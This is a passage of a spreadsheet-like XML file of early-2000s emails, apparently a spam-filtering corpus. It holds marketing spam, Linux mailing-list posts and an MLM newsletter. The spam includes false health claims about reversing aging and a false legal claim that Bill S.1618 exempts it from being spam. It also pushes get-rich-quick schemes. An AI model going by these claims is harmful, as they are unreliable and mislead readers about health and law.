 ailable for you to use on any new purchase=2E=20
  &lt;br&gt;
 &lt;br /&gt;&lt;br&gt;
  &lt;a href=3D
 "http://home=2Eattbi=2Ecom/~johnsonhomestor1/MAINMPF=2Ehtm"&gt;&lt;img src=3D
 "http://johnson2276=2Eitctv=2Ecom/j/johnson2276/Images/JHmainfeatures=2Ejp=
 g"
  border=3D"0" alt=3D"Click of to visit Our Online Features" /&gt;&lt;/a&gt;
 Please Click on to Check out our online special Features of
 products, Winners of our monthly contest=2E Featuring
 website=2E&lt;br /&gt;
 &lt;br /&gt;
 &lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;=20
 &lt;div class=3D"c6"&gt;&lt;img src=3D
 "http://johnson2276=2Eitctv=2Ecom/j/johnson2276/Images/DIVIDER2=2Egif"
 width=3D"300" height=3D"100" border=3D"0" alt=3D
 "" /&gt;&lt;/div&gt;
 &lt;span class=3D"c5"&gt;&lt;br /&gt;&lt;B&gt;
  When You Place an Order with J=2EH p&amp;amp;s online store, I offer
 you a free gift with any order you place with J=2EH p&amp;amp;s online
 store=2E&lt;br /&gt;
 &lt;a href=3D"http://home=2Eattbi=2Ecom/~johnsonhomestor1/onlinemailinform=2E=
 htm"&gt;
 &lt;img src=3D"http://johnson2276=2Eitctv=2Ecom/j/johnson2276/Images/ORDERFOR=
 M=2Egif" height=3D"50" width=3D"275"&gt;&lt;/A&gt;
 &lt;br /&gt;
 &lt;a href=3D
 "http://home=2Eattbi=2Ecom/~johnsonhomestor1/freebeepage32002=2Ehtm"&gt;&lt;img
  src=3D
 "http://johnson2276=2Eitctv=2Ecom/j/johnson2276/Images/JHfreeoffers=2Ejpg"=
  border=3D"0" alt=3D
 "Click On to see the Free Offer we have with any Order=2E Thank You!" /&gt;&lt;/=
 a&gt;
 Please click on to veiw our free offers when You Place an
 Order=2E&lt;br /&gt;
 &lt;br /&gt;
  &lt;a href=3D
 "http://home=2Eattbi=2Ecom/~johnsonhomestor1/orderingistruction=2Ehtm"&gt;&lt;im=
 g
  src=3D
 "http://johnson2276=2Eitctv=2Ecom/j/johnson2276/Images/JHorderingINS=2Ejpg=
 "
  border=3D"0" alt=3D
 "Click on to read about ordering by mail, Telephone orders, PayPal , and T=
 hrough our main Online super store=2E Thank you!" /&gt;&lt;/a&gt;
 Please click on to read&lt;br /&gt;
  about ordering,Through The mail, Fax orders, Paypal, and From
 J=2EH p&amp;amp;s online Store=2E&lt;br /&gt;
  I accept all major credit cards, checks and money orders=2E&lt;br /&gt;
 I offer a Toll Free Telephone number 1-866-236-1208 to place your
 order=2E&lt;br /&gt;
  You can also Print out our online order form=2E&lt;br /&gt;
 &lt;/span&gt;=20
 &lt;div class=3D"c6"&gt;&lt;img src=3D
 "http://johnson2276=2Eitctv=2Ecom/j/johnson2276/Images/DIVIDER2=2Egif"
 width=3D"300" height=3D"100" border=3D"0" alt=3D
 "Learn and Earn Money and Sell on Ebay" /&gt;&lt;/div&gt;
 &lt;br /&gt;
 The Following is about our Great Online Features I been offering=2E
 I also offer Live help You can Chat with me when I am Online with
 any questions, comments, concerns or suggestion you may
 have=2E&lt;br /&gt;
 &lt;br /&gt;
 &lt;a href=3D
 "http://www=2Ejohnsonhome2276=2Ecom/default=2Easp?S=3DAC3&amp;amp;Document=3DH=
 OROSCOPES"&gt;
 &lt;img src=3D
 "http://johnson2276=2Eitctv=2Ecom/j/johnson2276/Images/JHhoroscopes=2Ejpg"=
  border=3D"0" alt=3D"Click on to Read Your Daily Horoscope" /&gt;&lt;/a&gt;
 Please Click on to read your Daily Horoscope=2E&lt;br /&gt;
 &lt;br /&gt;
 &lt;a href=3D
 "http://home=2Eattbi=2Ecom/~johnsonhomestor1/gameinstructions=2Ehtm"&gt;&lt;img
  src=3D
 "http://johnson2276=2Eitctv=2Ecom/j/johnson2276/Images/JHgameINS=2Ejpg"
 border=3D"0" alt=3D
 "Click on over to Learn how to Play our Word search &amp;amp; Banner Bingo gam=
 es=2E Thank you!" /&gt;&lt;/a&gt;
 Please Click on to Learn how to Play our online&lt;br /&gt;
  Games and win weekly Prizes=2E&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  &lt;a href=3D
 "http://www=2Ejohnsonhome2276=2Ecom/default=2Easp?S=3DAC3&amp;amp;Document=3DA=
 bout+Us"&gt;
 &lt;img src=3D
 "http://johnson2276=2Eitctv=2Ecom/j/johnson2276/Images/JHaboutus=2Ejpg"
 border=3D"0" alt=3D
 "Click over to learn more about us, Also Join Our Email list, and Send us =
 you feedback about our online super store=2E" /&gt;&lt;/a&gt;
 Please Click on to read &lt;br /&gt;
 more about out J=2EH p&amp;amp;s and Join our Email list=2E Also send us
 your Feedback&lt;br /&gt;
  &lt;br /&gt;
 &lt;a href=3D
 "http://www=2Ejohnsonhome2276=2Ecom/default=2Easp?S=3DAC3&amp;amp;Document=3DO=
 ur+Policies"&gt;
 &lt;img src=3D
 "http://johnson2276=2Eitctv=2Ecom/j/johnson2276/Images/JHpolicies=2Ejpg"
  border=3D"0" alt=3D
 "Click over to read our Policies on Products &amp;amp; Services, also On Shipp=
 ing Rates=2E Thank You!" /&gt;&lt;/a&gt;
 Please click on to read &lt;br /&gt;
 our Policies on Products &amp;amp; Services&lt;br /&gt;
 &lt;br /&gt;
 &lt;div class=3D"c3"&gt;&lt;img src=3D
 "http://johnson2276=2Eitctv=2Ecom/j/johnson2276/Images/DIVIDER2=2Egif"
 width=3D"300" height=3D"100" border=3D"0" alt=3D
 "" /&gt;&lt;/div&gt;
 &lt;br /&gt;
  The following are some of the services I am offering and seeking
 new one to add &lt;br /&gt;
  &lt;br /&gt;
 &lt;a href=3D
 "http://home=2Eattbi=2Ecom/~johnsonhomestor1/jhsadvertising=2Ehtm"&gt;&lt;img
 src=3D
 "http://johnson2276=2Eitctv=2Ecom/j/johnson2276/Images/JHadvertising=2Ejpg=
 "
  border=3D"0" alt=3D
 "Click on over to Check out our great advertising Free Offer=2E Thank You!=
 " /&gt;&lt;/a&gt;
 Please click on to receive your 3 day free trial offer of
 advertising=2E&lt;br /&gt;
 After the 3 days are over you have the option to buy the service Plus for =
 only $4=2E95
 &lt;br&gt; per month, your text ad will be sent to 13,000 plus email=2E
 &lt;br /&gt;
 &lt;br /&gt;
 &lt;a href=3D"http://www=2Effanet=2Ecom/links/JOHNSONHOME2276=2Ehtm"&gt;&lt;img
 src=3D
 "http://johnson2276=2Eitctv=2Ecom/j/johnson2276/Images/FFALINK=2Egif"
 border=3D"0" alt=3D
 "Click on to Post Your link to our FFA site" /&gt;&lt;/a&gt;&lt;br /&gt;
 Please Click on to ad your link to our FFa Site=2E&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 &lt;a href=3D"http://www=2Eebaymarketer=2Ecom/johnsonhome"&gt;&lt;img src=3D
 "http://johnson2276=2Eitctv=2Ecom/j/johnson2276/Images/EBAY=2Egif"
 border=3D"0" alt=3D
 "Click on Check out this great offer=2ELearn and Earn Money online" /&gt;&lt;/a&gt;=
 Please Click on to Purchase This Ebook for only $24=2E95=2E&lt;br /&gt;
 Learn about Selling on ebay and making money online=2E&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 &lt;a href=3D
 "http://home=2Eattbi=2Ecom/~johnsonhomestor1/PRESSRELintroduct=2Ehtm"&gt;&lt;img=
  src=3D
 "http://johnson2276=2Eitctv=2Ecom/j/johnson2276/Images/jhpress=2Egif"
 border=3D"0" alt=3D
 "Click on over to Read our press release=2E Thank You!" /&gt;&lt;/a&gt;
 Please click on to Read=2E&lt;br /&gt;
  A topic we can all learn and grow From=2E&lt;br /&gt;
 &lt;br /&gt;
  &lt;table bgcolor=3D"#ffffff" bordercolor=3D"#6633ff" width=3D"250" height=3D=
 "25" border=3D'6' cellspacing=3D'7' cellpadding=3D'8'align=3D'center'&gt;
         &lt;tr&gt;
           &lt;td align=3D'center'&gt;
 =09=09=09=09=09&lt;br&gt;&lt;b&gt;To Be Remove&lt;br&gt;from my Email list&lt;b&gt;&lt;br&gt;
 &lt;a href=3D"mailto:JHSM@attbi=2Ecom"&gt;
  &lt;img src=3D"http://johnson2276=2Eitctv=2Ecom/j/johnson2276/Images/me41320=
 03=2Ejpg" border=3D"0" width=3D"75" height=3D"75"&gt;&lt;/a&gt;&lt;/font&gt;
 &lt;br&gt;&lt;font color=3D"#6633ff"&gt;&lt;small&gt;Under Bill s=2E1618 TITLE III passed by=
  the 105th US Congress, this letter=20
 cannot be considered "Spam" as long as the sender includes contact=20
 information &amp; a method of "removal"=2E&lt;/font&gt;&lt;/small&gt;&lt;br&gt;&lt;b&gt;Click me on to=
  click you off my email list Please Type "Remove Me " in the subject area =
 of your email=2E&lt;/small&gt;&lt;/font&gt;
 &lt;br&gt;&lt;br&gt;&lt;b&gt;
 Wishing you a Great Week!&lt;b&gt;
 &lt;br&gt;&lt;/tr&gt;&lt;/td&gt;
 &lt;/table&gt;=20
 ------=_NextPart_84815C5ABAF209EF376268C8--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 911 Anniv Bush Memorial Bill for You
</t>
  </si>
  <si>
    <t xml:space="preserve">----------------------------------------------------------
 &gt;&gt;  GiftCD Offer Newsletter Confirmation August 8th, 2002
 ----------------------------------------------------------
 Thank you for your subscription.
 As a valued GiftCD subscriber, check out this great 
 gift!
 Thank you for your subscription.
 This message was sent to you as a Valued GiftCD
 subscriber. Check out this great gift!
 +--------------------------------------------------------+
 911 Anniversary Gift.
 +--------------------------------------------------------+
 Free with NO SHIPPING! Grab one of this hot gift,
 available to all Americans for free. (valid until Sep 11)
 http://giftcd.com/offers/track_colonialmint.shtml
 +--------------------------------------------------------+
 FREE ColonialMint $2001 Bush Memorial Dollar Bill
 +--------------------------------------------------------+
 Perfect gift for mom, dad, family members, friends and 
 co-workers. Every American should have one.
 (Free gift valid for U.S. Residents Only)
 http://www.giftcd.com/offers/track_colonialmint.shtml
 +--------------------------------------------------------+
 ~~~ Free 911 Anniv $2001 Dollar gift.
 +--------------------------------------------------------+
 Limited collector item. Grab one of the hottest 
 American collection for FREE before Sep 11 2002.
 http://giftcd.com/offers/track_colonialmint.shtml
 Regards,
 Melanie Conell
 Gift CD Editorial Team
 http://www.giftcd.com
 ----------------------------------------------------------
 &gt;&gt;  Subscription, Disclaimer &amp; Copyright
 ----------------------------------------------------------
 This email is part of your GiftCD Newsletter
 subscription. If you are no longer interested, 
 please forward this email to:
 unsubscribenow@giftcd.com
 IMPORTANT: To protect our subscribers privacy, 
 we do not allow third party subscriptions. If you 
 receive this email by mistake or your friend subscribe 
 for you without your consent, please forward this email 
 to us for further investigation. 
 We welcome suggestions, comments and feedback. 
 Contact us at: optinsupport@giftcd.com
 ==========================================================
 Copyright 2002 GiftCD.com. All rights reserved.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Start on your summer look now
</t>
  </si>
  <si>
    <t xml:space="preserve">As seen on NBC, CBS, CNN, and even Oprah! The health 
 discovery that actually reverses aging while burning fat, 
 without dieting or exercise! This proven discovery has even 
 been reported on by the New England Journal of Medicine. 
 Forget  aging and dieting forever! And it's Guaranteed!   
 Click here:
 http://www205.wiildaccess.com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
 You are receiving this email as a subscriber
 to the Opt-In America Mailing List. 
 To unsubscribe from future offers,
 just click here:
 mailto:affiliateoptout@btamail.net.cn?Subject=off
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 13 Aug 2002, Mike Burger wrote:
 &gt; On Tue, 13 Aug 2002, David Raistrick wrote:
 &gt; 
 &gt; &gt; To actually answer Justin's question, (one can assume that he has
 &gt; &gt; rewrite_subject and report_header turned on because he wants them..and
 &gt; I wouldn't make that assumption.  I'd assume that rewrite_subject was on, 
 &gt; and report_header was off, because that's the default configuration, and 
 Erps.  I did misword that.  The message (and assumption) was oriented
 toward a message that has rewrite_subject on and report_header off...the
 default configuration.  For the header removals it contained enough to
 also take care of dcc_add_header 1, but not report_header 1.
 thanks.
 ..david
 ---
 david raistrick
 drais@atlasta.net		http://www.expita.com/nomime.html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</si>
  <si>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[ILUG-Social] Doom for Linux
</t>
  </si>
  <si>
    <t xml:space="preserve">hi all,
 I'm looking to get my hands on
 either Doom I or II for my PC.
 Unfortunately I cannot access 
 IDSoftware's site because of
 the silly web-filtering system
 in place here.
 Does anyone know where I can
 buy a copy of Doom (which I will
 be running on Linux...) online?
 Last time I asked in Game they laughed
 at me ;]
 I would ask to swap for Linux software
 but that wouldn't be ethical or legal.
 Hence the purchasing question.
 Regards,
 Shane
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Feel great,look super this summer
</t>
  </si>
  <si>
    <t xml:space="preserve"> 
 &gt; &gt; No, as of oh, about a year to a year and a half ago
 &gt; &gt; SuSE revoked it's free offering of it's retail
 &gt; &gt; distro.
 &gt; 
 &gt; &gt; Sometime about the start of the great slump, SuSE
 &gt; &gt; pulled free release of it's main x86 product.
 &gt; 
 &gt; 
 &gt; Fine - nobody can oblige SuSE to do anything other
 &gt; than put up the ftp version, but surely they
 &gt; can't prevent a CD owner from burning a copy and
 &gt; giving it to me?
 &gt; 
 &gt; What is the GPL all about then?
 Not everything on the SuSE CDs is GPL-ed.  IIRC, YAST
 has a more "proprietary" license.  There may be other
 third-party commercial products on there as well, which
 cannot be freely copied under the GPL.
 Later,
 Kenn
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Your Membership Exchange, #442
</t>
  </si>
  <si>
    <t xml:space="preserve">--1695567064.997091752024.JavaMail.RovAdmin.rovweb003
 Content-Type: text/plain; charset=iso-8859-1
 Your Membership Exchange, Issue #442 (August 6, 2001)
 ______________________________________________________
          Your Membership Daily Exchange
 &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; Issue #442 &lt;&gt; 08-06-01 &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
 Your place to exchange ideas, ask questions,
 swap links, and share your skills!
 ______________________________________________________
 Removal/Unsubscribe instructions are included at the bottom
 for members who do not wish to receive additional issues of
 this publication.
 ______________________________________________________
 You are a member in at least one of these programs
 - You should be in them all!
 http://www.BannersGoMLM.com
 http://www.ProfitBanners.com
 http://www.CashPromotions.com
 http://www.MySiteInc.com
 http://www.TimsHomeTownStories.com
 http://www.FreeLinksNetwork.com
 http://www.MyShoppingPlace.com
 http://www.BannerCo-op.com
 http://www.PutPEEL.com
 http://www.PutPEEL.net
 http://www.SELLinternetACCESS.com
 http://www.Be-Your-Own-ISP.com
 http://www.SeventhPower.com
 ______________________________________________________
 Today's Special Announcement:
 FREE WEB SITES for your Family, Groups, or Business. 
 Create A PRESENCE ON THE INTERNET for FREE. 
 SiteBlast FREE SOFTWARE walks you through the 
 design process, one step at a time. With HUNDREDS OF 
 PROFESSIONAL DESIGNS TO CHOOSE FROM you can customize 
 the site to your taste, personality, or corporate image.
 http://www.siteblast.com/index_sb.asp?site=3&amp;id=2084&amp;name=CashPromotions 
 ______________________________________________________
 ______________________________________________________
 &gt;&gt; Q &amp; A
    QUESTIONS:
      - Info on using Linux operation system?
    ANSWERS:
      - What can I do about my computer freezing?
            A. Lloyd-Rees: Computer freezing and a program to free up memory
 &gt;&gt; MEMBER SHOWCASES
 &gt;&gt; MEMBER *REVIEWS*
      - Sites to Review: #142, #143  &amp; #144!
      - Three new sites to review!
      - Site #141 Reviewed!
 ______________________________________________________
 &gt;&gt;&gt;&gt;&gt;&gt; QUESTIONS &amp; ANSWERS &lt;&lt;&lt;&lt;&lt;&lt;
 Submit your questions &amp; answers to MyInput@AEOpublishing.com
 QUESTIONS:
 From:  Terry Mills   - tlm@wwnet.net
 Subject: Info on using Linux operation system?
 In answer to the question in Exchange Issue #441, 
 WonderPaint gave a pretty darn good explanation of 
 what is going on in windows.  He suggests Linux.  
 My question is can the current software on my machine 
 use Linux if I were to switch to that OS and if not, how 
 much software is available for Linux.  Seems all I find is 
 for windows and some for the mac.  Thanks.
 Terry
 High quality LEADS for mlm.  Find three and get yours FREE. 
 Check the August Special!
 http://mysiteinc.com/tfn/leads.html
 ANSWERS:
 From:  Anthony Lloyd-Rees   - cutter@opalsinthebag.com
 Subject:  Computer freezing and a program to free up memory
 &gt;From:  NICETY7078@aol.com
 &gt;Subject:  What can I do about my computer freezing? (Issue #439)
 &gt;
 &gt;My computer freezes when I use AOL and sometimes when
 &gt;I'm just using the basic functions of Windows 98. My
 &gt;defragmentor  keeps starting over and over and my scan
 &gt;disk never finds anything wrong, but there has to be.
 Hello Nicety,
 I  have to agree with Jim Shofstall, http://www.wonderpaint.com,  
 when he wrote in Exchange Issue #441:
 &lt;snip&gt;
  One major problem is that many programs don't release memory 
 when you exit.  When working in Windoze I've always taken the 
 approach of rebooting on a regular basis before I've had problems, 
 &lt;/snip&gt;
 I believe AOL is a shell that sits on Windows, which pretty much 
 negates any hope for stability. *nix is the only non-Mac answer 
 for reliable computing. I am a Red Hat Linux user as everyone's 
 favourite Redmond OS obviously requires more smarts than I 
 have to make it do anything useful. 
 If you have to live with it however there is a cool little FREE 
 download called FreeMem which you can get here;
 http://www.meikel.com
 This utility frees up memory at a click when you exit an app, you 
 also get to see how your memory gets eaten up and not released. 
 This may not fix your problem but at least Windows will be 
 running at peak performance all the time and much easier than 
 constant rebooting. The more you use this OS the more of these 
 little third party fixer upper proggys and utilities you have to 
 search for.
 HTH.  Tony.
 ______________________________________________________
 &gt;&gt;&gt;&gt;&gt;&gt; WEBSITE SHOWCASES &lt;&lt;&lt;&lt;&lt;&lt;
 Examine carefully - those with email addresses included WILL
 trade links with you, you are encouraged to contact them. And,
 there are many ways to build a successful business. Just look at
 these successful sites/programs other members are involved in...
 -------------------------------------------------
 RETIRE QUICKLY--Free Report "Seven Secrets to Earning
 $100,000 from Home". Fully Automated Home Business.
 81% commissions-Income UNLIMITED. Automated Sales,
 Recruiting and Training MACHINE. Join NOW!
 http://orleantraders.4yoursuccess.org
 Trade Links - mailto:bgmlm@4yoursuccess.org
 -------------------------------------------------
 We Are Looking For A Handful Of "Qualified" People Who
 Want To Make An Insane Income... Interested?  If you do
 qualify, you will have access to the worlds most powerful
 online marketing system that can easily explode your income.
 http://by.advertising.com/1/c/22555/27369/82101/82101
 -------------------------------------------------
 CIGARETTES GO $MLM$ FREESamples AND Customer Membership 
 $5 OFF 1st Order, 600+ Varieties from $9.95 per carton! 
 BusOP Seekers - Cigarettes are the ultimate consumable! 
 High customer retention insures a steady residual income 
 http://www.key-list.com/track.cgi/mark2020/web6.html 
 Trade Links - tradlinks@brand-name-cigarettes.com
 -------------------------------------------------
 If you have a product, service, opportunity and/or quality
 merchandise that appeals to people worldwide, reach your
 target audience!
 For a fraction of what other large newsletters charge you
 can exhibit your website here for only $8 CPM. Why?...
 Because as a valuable member we want you to be successful!
 Order today - Exhibits are limited and published on a
 first come, first serve basis. http://bannersgomlm.com/ezine
 ______________________________________________________
 &gt;&gt;&gt;&gt;&gt;&gt; MEMBER *REVIEWS* &lt;&lt;&lt;&lt;&lt;&lt;
 Visit these sites, look for what you like and any suggestions
 you can offer, and send your critique to MyInput
 And, after reviewing three sites, your web site will be added to
 the list! It's fun, easy, and it's a great opportunity to give
 some help and receive an informative review of your own site.
 SITES TO REVIEW:
 Site #142:  http://www.sharesmiles.com
 James Garrison
 webmaster@sharesmiles.com
 Site #143:  http://www.selltheworldonline.com/default2.asp?ref=1282
 gofreet@yahoo.com.au
 Site #144:  http://www.tpcenterprises.com/
 info@tpcenterprises.com
 Site #145:   http://www.worldwidewebproductions.com
 Len Seider
 wORLDwIDEwEBPros@cs.com
 Site #146:  http://www.candlecreations.com
 Melissa Kalmbach
 melscandles@msn.com
 Site #147:  http://www.passionforperfume.com
 Janice Holton
 janice@passionforperfume.com
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 SITE  REVIEWED!
 Comments on Site #141:  http://www.floridarental.co.uk
 Carol Hall
 carol@floridarental.co.uk
 ~~~~
 Just finished looking over your site. It's very flashy and maybe
 just a tad overdone. I had difficulty finding my way around
 your site and couldn't understand its purpose until I had gone
 three pages into it. Maybe it would be a little more useful to
 make your front page navigation a little less confusing?
 The "next page" tab is right next to one that says "bookmark
 this page" - no information until you mouseover the tab to
 tell you you are entering the site. I felt a little overwhelmed
 with glitz - animated gif's overemphasized words etc and not
 enough information on your openning page.
 ~~~~
 I also surprised to see a site for Florida rentals with a URL
 ending with .uk.  Recommendations for this site.
 1. On the home page a person's eyes are drawn first to the
 animation and red text on the yellow background, missing
 the first sentence. Remove the animation and add more
 details to this important introduction. Instead of using the
 'click here' button, just have a text link following directly
 after the introduction.
 2. On the second page, have all your links the same color,
 and all your text a different color. Don't confuse people on
 what is a link and what they need to read. Underlined text
 on the internet can often be confused for a link, expecially
 when it is in the normal blue link color.  Having the
 important links in red and with the flashing arrow is overkill.
 3. On the rest of the site, you have good information, but
 you don't need the top menu bar when using the framed
 menu and the pages are all untitled.
 I hope you don't think I'm being too harsh, I just know you
 want the best site you can have and I think these changes
 will make a world of difference.  Once a person gets into the
 site you have the information organized and complete. I
 even wanted to come and stay!
 ~~~~
 The animations make this site look amateurish from the
 beginning.  The flashing "Bookmark This Site" makes me
 want to leave instead of come back!  The font Comic Sans
 MS also looks very kiddy.  Much could be done to improve
 this site.
 ~~~~
 I was confused by this site. There are four animated gifs on the
 first screen, and so my eyes kept flicking back and forth between
 them. I read over the paragraph of information, but didn't know
 where to click. I finally figured out the 'click here' button should
 have been up by the text and that is where I should go.
 On the 2nd page, again too many flashing gifs.  Other than that,
 the 2nd page was much easier to find my way around. One
 suggestion, if you're using frames it is unneccessary to have
 the menu of links listed both on one frame and at the top of
 the page as was shown on the 'special offers' page.
 The font style and bright colors made the site look casual and
 laid back, like a trip to Florida should be, so that was good.
 Besides the flashing gifs, by the time I left I liked this site, but
 if I hadn't been reviewing it I don't know if I would have gotten
 that far.
 ~~~~
 This site is bright and breezy. It is very clean, easy to read
 and navigate. Logically presented and information-rich.
 Some pages had too many animated images for my own taste,
 but the pages are happy and cheery. Tip: If you can get a hold
 of PaintShop Pro, you can take out the white squares that
 form a background for some images.
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ______________________________________________________
 moderator: Amy Mossel:  Moderator@AEOpublishing.com
 posting:  MyInput@AEOpublishing.com
 ______________________________________________________
 Send posts and questions (or your answers) to:
    mailto:MyInput@AEOpublishing.com
 Please send suggestions and comments to:
    mailto:Moderator@AEOpublishing.com
 To change your subscribed address, send both new
 and old address to mailto:Moderator@AEOpublishing.com
 See below for unsubscribe instructions.
 Copyright 2001 AEOpublishing
 ----- End of Your Membership Exchange
 ------------------------------------------------
 ------------------------------------------------
 This email has been sent to jm@netnoteinc.com at your 
 request, by Your Membership Newsletter Services.
 Visit our Subscription Center to edit your interests or unsubscribe.
 http://ccprod.roving.com/roving/d.jsp?p=oo&amp;id=bd7n7877.jbozuta6&amp;m=bd7n7877&amp;ea=jm@netnoteinc.com
 View our privacy policy: http://ccprod.roving.com/roving/CCPrivacyPolicy.jsp
 Powered by 
 Constant Contact(R)
 www.constantcontact.com
 --1695567064.997091752024.JavaMail.RovAdmin.rovweb003
 Content-Type: text/html; charset=iso-8859-1
 &lt;HTML&gt;
 &lt;!-- 
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;HTML-FORMATTED MESSAGE BELOW
 The remainder of this message is in HTML format for use by email
 clients that can properly display it.   If you are seeing this message,
 it is because your email client cannot properly display HTML.  You can
 ignore the HTML code you will see below.
  --&gt;
 &lt;head&gt;
 	&lt;title&gt;Your Membership Exchange, #442&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#ffffff" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"&gt;
 &lt;IMG SRC="http://ccprod.roving.com/roving/sa/o.jsp?id=bd7n7877.jbozuta6&amp;o=http://ccprod.roving.com/roving/images/p1x1.gif" WIDTH=1 HEIGHT=1 alt=" "&gt;
 &lt;!--  Do NOT delete previous line if you want to get statistics on the number of opened emails  --&gt;
 &lt;center&gt;
 &lt;!-- Begin Logo Include --&gt;
 &lt;!-- START CONDITIONAL HTML HIDING 
             &lt;img src="" border="0" vspace="2" alt=""&gt;
  END OF CONDITIONAL HTML HIDING --&gt; 
 &lt;!-- End Logo Include --&gt;
 &lt;table border="0" cellpadding="0" cellspacing="0" width="575"&gt;
 &lt;tr&gt;
 	&lt;td width="25"&gt;&lt;img src="http://ccprod.roving.com/roving/images/letters/gray-corner-tl.gif" width="25" height="25" border="0" alt=""&gt;&lt;/td&gt;
 	&lt;td width="525" bgcolor="#666666"&gt;&lt;/td&gt;
 	&lt;td width="25" bgcolor="#666666"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;!-- Begin Title Row --&gt;
 &lt;tr&gt;
 	&lt;td width="25" bgcolor="#666666"&gt;&lt;/td&gt;
 	&lt;td width="525" bgcolor="#CCCCCC"&gt;&lt;font face="Verdana,Geneva,Arial,Helvetica,sans-serif" size="5" color="#870000"&gt;Your Membership Exchange, Issue #442&lt;/font&gt;&lt;/td&gt;
 	&lt;td width="25" bgcolor="#666666"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;!-- End Title Row --&gt;
 &lt;!-- Begin Date String Row --&gt;
 &lt;tr&gt;
 	&lt;td width="25" bgcolor="#666666"&gt;&lt;/td&gt;
 	&lt;td width="525" bgcolor="#CCCCCC" align="right"&gt;&lt;font face="Verdana,Geneva,Arial,Helvetica,sans-serif" size="2" color="#000000"&gt;August 6, 2001&lt;/font&gt;&lt;/td&gt;
 	&lt;td width="25" bgcolor="#666666"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;!-- End Date String Row --&gt;
 &lt;tr&gt;
 	&lt;td width="575" colspan="3" height="1" bgcolor="#666666"&gt;&lt;img src="http://ccprod.roving.com/roving/images/letters/spacer.gif" width="1" height="1" border="0" alt=""&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 	&lt;td width="25" bgcolor="#870000"&gt;&lt;/td&gt;
 	&lt;td width="525" bgcolor="#FFFFFF"&gt;
 	&lt;!-- Begin Content Table --&gt;
 	&lt;table border="0" cellpadding="6" cellspacing="0" width="100%"&gt;
 	&lt;tr&gt;
 		&lt;td width="100%"&gt;
 		&lt;font face="Verdana,Geneva,Arial,Helvetica,sans-serif" size="2" color="#000000"&gt;
 		&lt;!-- Begin Greeting --&gt;
 		Your place to exchange ideas, ask questions, swap links, and share your skills!
 		&lt;!-- End Greeting --&gt;
 		&lt;!-- Begin Letter Body --&gt;
 		&lt;p&gt;______________________________________________________
 &lt;br&gt;You are a member in at least one of these programs
 &lt;br&gt;- You should be in them all!
 &lt;br&gt;&lt;a href="http://www.BannersGoMLM.com"&gt;BannersGoMLM.com&lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.ProfitBanners.com"&gt;ProfitBanners.com&lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.CashPromotions.com"&gt;CashPromotions.com&lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.MySiteInc.com"&gt;MySiteInc.com&lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.TimsHomeTownStories.com"&gt;TimsHomeTownStories.com&lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.FreeLinksNetwork.com"&gt;FreeLinksNetwork.com&lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.MyShoppingPlace.com"&gt;MyShoppingPlace.com&lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.BannerCo-op.com"&gt;BannerCo-op.com&lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.PutPEEL.com"&gt;PutPEEL.com&lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.PutPEEL.net"&gt;PutPEEL.net&lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.SELLinternetACCESS.com"&gt;SELLinternetACCESS.com&lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.Be-Your-Own-ISP.com"&gt;Be-Your-Own-ISP.com&lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.SeventhPower.com"&gt;SeventhPower.com&lt;/a&gt;
 &lt;br&gt;______________________________________________________&lt;br&gt;
 &lt;br&gt;Today's Special Announcement:
 &lt;p&gt;FREE WEB SITES for your Family, Groups, or Business.
 &lt;br&gt;Create A PRESENCE ON THE INTERNET for FREE.
 &lt;br&gt;SiteBlast FREE SOFTWARE walks you through the
 &lt;br&gt;design process, one step at a time. With HUNDREDS OF
 &lt;br&gt;PROFESSIONAL DESIGNS TO CHOOSE FROM you can
 &lt;br&gt;customize the site to your taste, personality, or corporate image.
 &lt;br&gt;&lt;a href="http://www.siteblast.com/index_sb.asp?site=3&amp;id=2084&amp;name=CashPromotions"&gt;Free
 Web Site&lt;/a&gt;
 &lt;br&gt;______________________________________________________
 		&lt;p&gt;&lt;p&gt;&gt;&gt; Q &amp;amp; A
 &lt;br&gt;&amp;nbsp;&amp;nbsp; QUESTIONS:
 &lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; - Info on using Linux operation system?
